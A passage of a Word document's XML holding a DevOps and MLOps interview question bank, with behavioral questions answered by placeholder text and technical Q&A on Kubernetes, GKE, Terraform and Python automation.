        <w:t>Add data ingestion, validation, feature engineering, feature store, experiment tracking, training orchestration, model registry, approval workflow, model serving, A/B testing, model monitoring, drift detection, bias checks, and automated retraining. For production inference, include autoscaling, batching, GPU/TPU planning, latency SLOs, model rollback, and prediction logging.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Google-scale concerns:</w:t>
        <w:br/>
        <w:t>Discuss multi-region architecture, global load balancing, tenant isolation, quota management, platform self-service, standardized golden paths, error budgets, incident response, disaster recovery testing, cost governance, and compliance evidence. A strong answer should show tradeoffs: managed services vs control, active-active vs active-passive, consistency vs availability, and speed vs safety.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Behavioral - Reliability &amp; Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1186. Describe a time when a production system you were responsible for degraded or failed. What happened, how did you detect it, what immediate actions did you take, and how did you prevent recurrence?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Behavioral/Leadership</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Behavioral/Leadership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Describe a time when a production system you were responsible for degraded or failed. What happened, how did you detect it, what immediate actions did you take, and how did you prevent recurrence?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1187. Give an example of infrastructure you architected or significantly improved (cloud, IaC, containerized stack). What trade-offs did you weigh - cost, scalability, resilience, maintenance - and what would you do differently now?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Behavioral/Leadership</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Behavioral/Leadership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Give an example of infrastructure you architected or significantly improved (cloud, IaC, containerized stack). What trade-offs did you weigh - cost, scalability, resilience, maintenance - and what would you do differently now?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1188. Describe a situation where you had to create or improve monitoring, observability, or alerting for a system. What metrics/logs/traces did you choose, how did you set alert thresholds or SLOs, and how did you measure success?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Behavioral/Leadership</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Behavioral/Leadership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Describe a situation where you had to create or improve monitoring, observability, or alerting for a system. What metrics/logs/traces did you choose, how did you set alert thresholds or SLOs, and how did you measure success?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1189. [Incomplete in source - question was cut off after] Have you ever had to write automation or ... (capture the rest next time this screenshot/page is available, then replace this entry)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Behavioral/Leadership</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Behavioral/Leadership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[Incomplete in source - question was cut off after] Have you ever had to write automation or ... (capture the rest next time this screenshot/page is available, then replace this entry)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Behavioral - Screening Rounds</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1190. Can you describe your professional background and highlight the experiences most relevant to this role?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Behavioral/Screening</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Behavioral/Screening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Can you describe your professional background and highlight the experiences most relevant to this role?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1191. Walk us through a time when you improved the CI/CD pipeline for a project. What challenges did you face, and how did you address them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/GitOps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Walk us through a time when you improved the CI/CD pipeline for a project. What challenges did you face, and how did you address them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1192. How have you implemented observability and incident response practices in previous roles? Give an example of how these practices improved system reliability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the SRE/Reliability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How have you implemented observability and incident response practices in previous roles? Give an example of how these practices improved system reliability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Advanced Kubernetes, GCP, Terraform, Python and Scenario-Based Questions (1001-1080)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1193. How do you troubleshoot a Kubernetes pod stuck in CrashLoopBackOff?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start by checking `kubectl describe pod` for events, restart count, image pull issues, probes, resource limits, and node placement. Then inspect logs using `kubectl logs --previous` because the current container may restart too quickly. Common causes include bad configuration, missing secrets, failed dependencies, insufficient memory, wrong command arguments, or failing startup checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1194. A pod is running but the application is not reachable through the Service. How would you debug it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check whether the Service selector matches the pod labels and confirm endpoints exist using `kubectl get endpoints` or `kubectl get endpointslices`. Then test pod IP, service DNS, service port, targetPort, NetworkPolicy, ingress rules, and application bind address. A frequent issue is the app listening on `127.0.0.1` instead of `0.0.0.0`.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1195. How do readiness and liveness probes differ in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Readiness probes decide whether a pod should receive traffic, while liveness probes decide whether a container should be restarted. A failing readiness probe removes the pod from Service endpoints without killing it. A failing liveness probe restarts the container, so it should only check unrecoverable application health.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1196. Scenario: After a deployment, 30 percent of requests fail. How would you respond?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First reduce impact by rolling back, pausing rollout, or shifting traffic away from the new version. Then compare old and new pods using logs, metrics, traces, config, environment variables, dependency versions, and request patterns. After identifying the cause, add better automated checks such as canary analysis, smoke tests, or stricter readiness probes before the next release.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1197. What is the difference between a Deployment, StatefulSet, and DaemonSet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Deployment manages stateless replicated applications and supports rolling updates. A StatefulSet provides stable network identity and stable persistent storage for stateful workloads such as databases. A DaemonSet ensures one pod runs on each selected node, commonly for logging agents, monitoring agents, CNI components, or security tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1198. How do you design resource requests and limits for production workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Set requests based on normal usage plus headroom so the scheduler can place pods reliably. Set limits carefully because CPU limits can throttle applications and memory limits can cause OOM kills. Use historical metrics, load tests, vertical pod autoscaler recommendations, and SLO requirements to tune values over time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1199. Scenario: Kubernetes nodes are under memory pressure. What would you check?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check node conditions, pod memory usage, OOMKilled events, eviction thresholds, requests vs actual usage, and workloads without limits. Also inspect DaemonSet overhead, memory leaks, cache-heavy processes, and whether the cluster autoscaler can add nodes. Short-term mitigation may include scaling nodes or evicting noncritical workloads; long-term fixes include right-sizing requests and improving workload memory behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1200. Explain Horizontal Pod Autoscaler and when it may not work well.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: HPA scales pod replicas based on metrics such as CPU, memory, or custom metrics. It may not work well if requests are missing, metrics-server is unavailable, traffic spikes faster than pods can start, or the bottleneck is external such as a database. For queue-based systems, custom metrics like queue depth often work better than CPU.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1201. Scenario: Pods are Pending even though the cluster has free CPU. What could be wrong?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Possible causes include insufficient memory, node selector mismatch, taints without tolerations, strict affinity rules, unavailable persistent volumes, pod quota limits, or topology spread constraints. CPU alone does not guarantee schedulability. Use `kubectl describe pod` to read scheduler events and identify the exact constraint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1202. What are taints and tolerations?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Taints repel pods from nodes unless the pods have matching tolerations. They are useful for dedicated nodes, GPU nodes, system workloads, or isolating special environments. Tolerations allow scheduling but do not force it; node affinity or node selectors are needed to attract pods to specific nodes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1203. How do you secure Kubernetes secrets?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use least-privilege RBAC, encrypt secrets at rest, restrict secret access by namespace and service account, and avoid storing secrets in plain Git. Prefer external secret managers such as Google Secret Manager with Workload Identity. Also rotate secrets, audit access, and avoid exposing secrets through environment dumps or logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1204. What is Workload Identity in GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Workload Identity lets Kubernetes service accounts securely impersonate Google service accounts without long-lived JSON keys. It improves security by removing static credentials from pods. Access is controlled through IAM bindings between Kubernetes service accounts and Google service accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1205. Scenario: A GKE workload gets permission denied when accessing Cloud Storage. How do you debug it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check the Kubernetes service account, Google service account annotation, IAM binding, and required IAM roles on the bucket or project. Confirm Workload Identity is enabled and the pod is using the expected service account. Then test token identity from inside the pod and verify no organization policy or VPC Service Controls rule is blocking access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1206. How do you design a private GKE cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use private nodes, restricted control plane access, Cloud NAT for outbound internet if needed, private Google access, least-privilege service accounts, and authorized networks. Place workloads in controlled subnets with firewall rules, NetworkPolicy, and workload identity. For production, include logging, monitoring, binary authorization, and upgrade strategy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1207. Scenario: GKE cost suddenly increased. What would you investigate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check node pool scaling, workload requests, idle nodes, GPU usage, persistent disks, load balancers, logs volume, egress traffic, and newly deployed workloads. Compare billing by label, namespace, cluster, and service. Fixes may include right-sizing requests, using autoscaling, cleaning unused disks, reducing log noise, and applying resource quotas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1208. How do you make Terraform state secure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Store state remotely in a controlled backend such as GCS with versioning, encryption, and restricted IAM. Avoid putting secrets directly into Terraform variables or outputs because state can store sensitive values. Use state locking where supported, separate state by environment or domain, and audit access regularly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1209. What is Terraform drift and how do you handle it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Drift happens when real infrastructure changes outside Terraform and no longer matches the state or configuration. Detect it using `terraform plan`, scheduled drift checks, or policy tooling. Handle it by importing intentional changes, reverting manual changes, or updating Terraform code after review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1210. Scenario: `terraform apply` wants to recreate a production database. What do you do?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Stop immediately and inspect the plan to identify which attribute is forcing replacement. Check provider changes, module changes, state drift, lifecycle rules, and renamed resources. Use safer actions such as `lifecycle prevent_destroy`, state moves, imports, or targeted changes only after review and backup validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1211. Explain `for_each` vs `count` in Terraform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: `count` creates multiple resources by numeric index, which can cause unwanted replacement when list order changes. `for_each` uses stable keys from a map or set, making it safer for named resources. In production modules, `for_each` is often preferred for resources with meaningful identities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1212. How do you structure Terraform modules for a platform team?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Create reusable modules for common patterns such as VPCs, GKE clusters, IAM, service accounts, storage, and monitoring. Keep modules opinionated but configurable, with clear inputs, outputs, examples, versioning, and validation rules. Platform teams should also enforce policy checks and provide golden paths instead of unlimited flexibility.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1213. Scenario: A Terraform plan passes locally but fails in CI. What could be the issue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Possible causes include different Terraform or provider versions, missing environment variables, different credentials, backend access problems, workspace mismatch, stale lock files, or unavailable APIs. Pin versions, use consistent CI images, validate credentials, and run `terraform init -upgrade` only intentionally. CI should be the source of truth for approved applies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1214. How do you manage multiple environments in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Common approaches include separate directories, separate state files, workspaces, or a combination with environment-specific variable files. For production-grade systems, separate state per environment is usually safer and easier to control. Keep shared modules reusable while isolating blast radius between dev, staging, and prod.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1215. How do you use Python in DevOps or MLOps automation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Python is useful for building automation scripts, APIs, CI/CD helpers, cloud integrations, data validation, log analysis, and operational tooling. It has strong libraries for GCP, Kubernetes, Terraform wrappers, testing, and ML workflows. Good automation should include logging, retries, timeouts, error handling, tests, and clear configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1216. Scenario: A Python automation script works manually but fails in a cron job. How do you debug it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check environment variables, working directory, PATH, Python version, virtual environment, permissions, and credentials. Add structured logs and absolute paths. Cron jobs often fail because they run with a minimal environment compared to an interactive shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1217. How do you handle retries in Python automation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Retry only transient failures such as network timeouts, rate limits, and temporary service errors. Use exponential backoff with jitter and a maximum retry limit to avoid overload. Do not blindly retry non-idempotent operations unless you have idempotency keys or safe duplicate handling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1218. What is idempotency and why does it matter in automation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Idempotency means running the same operation multiple times produces the same final result without unintended side effects. It matters because automation can fail halfway and be retried. Terraform, Kubernetes reconciliation, and reliable deployment scripts all depend on idempotent behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1219. Scenario: Your Python script calling GCP APIs hits quota errors. What would you do?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First confirm the quota type, project, region, API, and request rate. Add exponential backoff, batching, caching, pagination, and concurrency limits. If usage is valid, request quota increases and add monitoring so the team sees quota pressure before failures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1220. How do you write production-quality Python scripts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use functions, type hints where helpful, argument parsing, clear logging, config files or environment variables, tests, and robust exception handling. Avoid hardcoded credentials and magic values. Package reusable logic and make scripts safe to run repeatedly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1221. What is the difference between a Python list, tuple, set, and dictionary?</w:t>
      </w:r>
    </w:p>
